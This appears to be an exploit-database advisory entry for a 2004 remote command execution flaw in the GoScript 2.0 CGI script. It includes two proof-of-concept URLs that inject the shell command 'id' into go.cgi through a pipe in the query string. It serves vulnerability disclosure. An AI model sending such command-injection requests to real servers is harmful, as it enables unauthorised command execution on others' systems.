Pete Stein GoScript 2.0 - Remote Command Execution

Author: Francisco Alisson
type: webapps
platform: cgi
port: 
date_added: 2004-08-04  
date_updated: 2013-01-24  
verified: 1  
codes: OSVDB-8935  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 24347.txt  
source: https://www.securityfocus.com/bid/10853/info

Pete Stein GoScript is prone to a remote command execution vulnerability.

This may allow remote attackers to perform unauthorized actions on a victim computer in the context of the hosting Web server.

http://www.example.com/go.cgi?|id|
http://www.example.com/go.cgi?artarchive=|id|